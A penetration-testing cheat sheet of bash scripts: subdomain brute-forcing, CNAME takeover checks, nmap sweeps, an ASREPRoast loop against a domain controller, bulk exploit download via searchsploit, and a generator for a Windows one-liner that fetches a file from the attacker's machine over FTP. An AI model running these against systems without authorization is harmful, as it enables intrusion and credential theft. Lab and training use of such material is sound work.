Bash Voodoo
#Print the exit status of the most recent command (0 = success, anything else = failure)
printf '%s\n' "$?"
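#Find out whether a given domain resolves: host(1) exits non-zero when the lookup fails.
#The message must use plain ASCII quotes; typographic quotes are passed to echo as literal characters.
if host target.com >/dev/null 2>&1; then echo "It Resolves"; fi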
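#enumerate subdomains: print "<word>.sbtuk.net" for every line of subdomains.txt.
#-r keeps backslashes literal; default IFS trims stray leading/trailing blanks from each word;
#the || [[ -n ... ]] clause still processes a last line that has no trailing newline.
while read -r sub || [[ -n "$sub" ]]; do
  [[ -n "$sub" ]] || continue   # skip blank lines
  printf '%s.sbtuk.net\n' "$sub"
done < subdomains.txt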
#Create subdomains.txt separately; the file contains:
admin
test
qa
dev
www
m
blog
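#Bruteforce subdomains | chmod +x and run
#!/bin/bash
#Reads one label per line from subdomains.txt and prints every "<label>.<domain>"
#that resolves. The domain defaults to yahoo.com and can be overridden with $1.
#The script only needs the executable bit (chmod +x); a world-writable 777
#mode lets any local user rewrite what you are about to run.
domain=${1:-yahoo.com}
while read -r sub || [[ -n "$sub" ]]; do
  [[ -n "$sub" ]] || continue   # skip blank lines
  # host(1) exits non-zero when the name does not resolve; its output is
  # discarded so that only the hits are printed
  if host "$sub.$domain" >/dev/null 2>&1; then
    printf '%s\n' "$sub.$domain"
  fi
done < subdomains.txt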
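#Resolving CNAMES script | cnames.sh
##Use the subdomains.txt list above to enumerate for hostile takeover##
#!/bin/bash
#Usage: ./cnames.sh <domain> < subdomains.txt
#For each label read from stdin, looks up the CNAME of <label>.<domain> and
#reports CNAME targets that no longer resolve (dangling records).
domain=${1:?usage: $0 domain < subdomains.txt}
while read -r sub || [[ -n "$sub" ]]; do
  [[ -n "$sub" ]] || continue   # skip blank lines
  # host prints "X is an alias for Y." -- the last field is the CNAME target;
  # exit after the first match so $cname is always a single name
  cname=$(host -t CNAME "$sub.$domain" | awk '/an alias/ {print $NF; exit}')
  [[ -n "$cname" ]] || continue   # no CNAME record for this label
  if ! host "$cname" >/dev/null 2>&1; then
    printf '%s did not resolve (%s.%s)\n' "$cname" "$sub" "$domain"
  fi
done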
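#Feed the subdomain list into cnames.sh to check yahoo.com (the script reads labels from stdin,
#so a redirect is enough; no cat needed)
./cnames.sh yahoo.com < subdomains.txt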
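#export IP variable so later commands and child processes can reuse the target address
export IP=192.168.101.57
#default-script + version scan; -oA writes all three nmap output formats with the basename "quick"
nmap -sC -sV -oA quick "$IP"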
#Repeat the last command
!-1
OR
!!
#Reverse-i search
press Ctrl+R, then type dpkg (to search the history for dpkg)
#History tricks
HISTCONTROL=ignoredups                 # do not record a command identical to the previous one
HISTIGNORE='&:ls:[bf]g:exit:history'   # never record these common commands
export HISTCONTROL HISTIGNORE
#Assign a command's output to a variable, then print it
user="$(whoami)"
printf '%s\n' "$user"
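#URL generator script
#!/bin/bash
#Appends 600 lines (6 cities x 10 x 10) of the form
#http://example/com/<city>/<digit>/<digit> to password.txt.
#password.txt is opened once for the whole loop instead of once per line.
#NOTE(review): "example/com" looks like a typo for "example.com" -- confirm before relying on the output.
for i in tokyo beijing newyork rome bangkok osaka; do
  for j in {0..9}; do
    for k in {0..9}; do
      printf 'http://example/com/%s/%s/%s\n' "$i" "$j" "$k"
    done
  done
done >> password.txt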
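#ping sweep script
#!/bin/bash
#A sequential sweep takes about a second per address, so 255 hosts take
#minutes. Each ping is started in the background (&) so the probes run
#concurrently; the final wait keeps the script alive until every probe has
#reported instead of exiting while replies are still arriving.
#Expects one address per line in ips.txt.
while read -r ip || [[ -n "$ip" ]]; do
  [[ -n "$ip" ]] || continue   # skip blank lines
  ping -c 1 "$ip" &
done < ips.txt
wait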
#Print out all IPs in a given subnet (10.11.1.1 .. 10.11.1.10)
for ip in {1..10}; do
  printf '10.11.1.%s\n' "$ip"
done
#Variation with a brace range: prints 10.11.1.0 .. 10.11.1.255
for i in {0..255}; do
  printf '10.11.1.%s\n' "$i"
done
#Same output but using a while loop instead
-lt flag stands for "less than"
(will print out 1 - 9 and exclude 10)
#!/bin/bash
# while loop example: prints 10.11.1.1 through 10.11.1.9
counter=1
while (( counter < 10 )); do
  printf '10.11.1.%s\n' "$counter"
  counter=$(( counter + 1 ))
done
#Create a list of hosts on stdout (redirect it to list.txt if a file is wanted)
#This command will print out all possible addresses in Lab subnet (.0 to .254)
for i in {0..254}; do
  printf '10.11.1.%s\n' "$i"
done
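#Redirecting output to a file: list.txt is opened once (append) for the whole loop
#instead of being reopened on every iteration
for i in {1..10}; do
  printf '10.11.1.%s\n' "$i"
done >> list.txt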
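#wget a given target and use grep/bash to filter for subdomains
#wget only writes index.html into the current directory, so it needs no root;
#running it under sudo just leaves a root-owned file behind.
wget www.megacorpone.com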
#use a fixed-string grep for "href=" to extract all the lines in index.html that contain HTML links
grep -F -- 'href=' index.html
#beautify the output: keep megacorpone links, drop the www host, print what follows "http://"
grep -F 'href=' index.html \
  | grep -F '.megacorpone' \
  | grep -vF 'www.megacorpone.com' \
  | awk -F 'http://' '{print $2}'
#using cut to only leave subdomains: same pipeline, then keep the part before the first "/"
grep -F 'href=' index.html \
  | grep -F '.megacorpone' \
  | grep -vF 'www.megacorpone.com' \
  | awk -F 'http://' '{print $2}' \
  | cut -d '/' -f 1
#grep -o prints only the part of each line that matches the regular expression;
#sort -u removes duplicates before the names are written to list.txt
grep -o -e '[^/]*\.megacorpone\.com' -- index.html | sort -u > list.txt
'[^/]*\.megacorpone\.com' is the pattern we are looking for
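#DNS recon scripts: build the address list first (list.txt opened once, appended to)
for i in {0..255}; do
  printf '10.11.1.%s\n' "$i"
done >> list.txt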
Then:
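#look up every entry of list.txt (read line by line; no word-splitting or globbing of the contents)
while read -r url || [[ -n "$url" ]]; do [[ -n "$url" ]] && host "$url"; done < list.txt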
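#Parse through output grepping for available addresses: field 4 of each "has address" line, de-duplicated
while read -r url || [[ -n "$url" ]]; do
  [[ -n "$url" ]] && host "$url"
done < list.txt | awk '/has address/ {print $4}' | sort -u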
#Using curl
#Similar to wget technique but with curl: take the host part of each href,
#keep cisco.com names, strip the closing quote and save the unique list to "test"
curl -s https://www.cisco.com \
  | grep -F 'href=' \
  | cut -d '/' -f 3 \
  | grep 'cisco.com' \
  | cut -d '"' -f 1 \
  | sort -u > test
#Beautify output: pull every *.cisco.com-looking token straight out of the page body
curl -s https://www.cisco.com \
  | grep -o -e '[A-Za-z0-9\._-]*\.*cisco\.com' \
  | sort -u
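#Parsing with grep: resolve each unique name found in the page and print the addresses.
#Process substitution feeds the names line by line, so nothing is word-split or globbed.
while read -r url; do
  [[ -n "$url" ]] || continue
  host "$url" | awk '/has address/ {print $4}'
done < <(curl -s https://www.cisco.com | grep -o '[A-Za-z0-9\._-]*\.*cisco\.com' | sort -u)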
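#Running Autorecon against an entire subnet
#Use nmap sweep to check all ports; -oG writes grepable output, --open keeps only open ports
nmap -A --open 10.11.1.0/24 -oG Available_nmap-scan_10.11.1.1-254
#In grepable output the address is the second field of every "Host:" line;
#the "# Nmap ..." header/footer lines are skipped (no cat needed)
awk '!/Nmap/ {print $2}' Available_nmap-scan_10.11.1.1-254 | sort -u
#Redirect output to another file --> targets.txt
awk '!/Nmap/ {print $2}' Available_nmap-scan_10.11.1.1-254 | sort -u > targets.txt
autorecon targets.txt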
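#Workaround to use nmapAutomator against a subnet: one background run per line of
#targets.txt; wait blocks until all of them have finished instead of returning
#while the scans are still running.
while read -r ip || [[ -n "$ip" ]]; do
  [[ -n "$ip" ]] || continue   # skip blank lines
  bash /usr/local/bin/nmapAutomator.sh --host "$ip" --type Full -o scan.txt &
done < targets.txt
wait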
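#Reverse lookup script
#!/bin/bash
#Prompts for the first three octets of a /24 and runs "host -l" on every address .1 to .254.
echo "Please enter first 3 octets. e.g 192.168.1"
read -r subnet
# an empty answer would otherwise loop over ".1" .. ".254"
[[ -n "$subnet" ]] || { echo "no subnet given" >&2; exit 1; }
for (( i = 1; i <= 254; i++ )); do
  host -l "$subnet.$i"
done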
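#check ASREPRoast for all domain users (without credentials)
#one GetNPUsers.py run per line of users.txt; the Impacket banner line is filtered out
while read -r user || [[ -n "$user" ]]; do
  [[ -n "$user" ]] || continue   # skip blank lines
  GetNPUsers.py -no-pass -dc-ip 10.10.10.161 "domain/${user}" | grep -v Impacket
done < users.txt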
#Bash customization | edit /etc/bash.bashrc with root privileges
#(/etc/bash.bashrc is the system-wide rc file, so an alias placed there is picked up by every user's shell)
nano /etc/bash.bashrc
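#alias syntax: no spaces around "=", and the whole command in single quotes so that
#$ip is expanded when the alias is used, not when the rc file is sourced.
#gobuster is an ordinary HTTP client and needs no root, so sudo is dropped.
#NOTE(review): "-e u" looks like a stray argument next to --url; confirm against gobuster's flag list.
alias gobustLin='gobuster dir -e u --url "http://$ip/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x php,bak,html,txt,zip'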
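#Search for a given exploit and download all matches
#!/bin/bash
#replace redcliff debian with keywords to search for
#searchsploit -w prints one URL per hit in a "|"-separated table; the URL's last
#path element becomes the local file name and "exploits" is swapped for "raw".
#TLS verification stays on: the downloads are code you will run, and
#--no-check-certificate would let a substituted file through unnoticed.
searchsploit redcliff debian -w -t | grep http | cut -f 2 -d '|' \
  | while read -r e; do   # default IFS trims the table padding around the URL
      [[ -n "$e" ]] || continue
      url=${e/exploits/raw}
      exp_name=${e##*/}
      [[ -n "$exp_name" ]] || continue   # nothing sensible to name the file after
      wget -q "$url" -O "$exp_name"
    done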
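#FTP script to spawn a one-liner for downloading
#!/bin/bash
#Outputs a one liner to paste into a Windows host to create and run a ftp script to download a given file.
#Prompts for port (default 21), username, password and file name; the IP is taken from tun0.
# Text coloring (ANSI escapes; $'...' lets printf '%s' emit them without -e)
yellow=$'\033[1;33m'
red=$'\033[1;91m'
nc=$'\033[0m'
echo
printf '%s\n' "${yellow}This gives you a one liner to paste into a Windows host to create and run a ftp script."
echo
# change tun0 to your interface if needed
# first IPv4 "inet" line only; sub() also copes with the older "inet addr:A.B.C.D" ifconfig layout
ip=$(ifconfig tun0 | awk '/inet /{sub(/^addr:/, "", $2); print $2; exit}')
[[ -n "$ip" ]] || printf '%s\n' "${red}warning: no IPv4 address found on tun0${nc}" >&2
printf '%s\n' "Using IP address of tun0: $ip"
echo
printf '%s\n' "What port do you want the ftp server to run on? Hit enter for default of 21${nc}"
read -r port
ftpport=${port:-21}   # empty answer -> default 21
echo
printf '%s\n' "${yellow}Enter the username: ${nc}"
read -r user
echo
printf '%s\n' "${yellow}Enter the password: ${nc}"
read -r pass
echo
printf '%s\n' "${yellow}What file do you want the remote host to download?${nc}"
read -r file
echo
printf '%s\n' "${yellow}Paste the below to create a ftp script and run it:${nc}"
echo
printf '%s\n' "echo open $ip $ftpport>ftp.txt&&echo $user>>ftp.txt&&echo $pass>>ftp.txt&&echo bin>>ftp.txt&&echo get $file>>ftp.txt&&echo bye>>ftp.txt&&ftp -s:ftp.txt"
echo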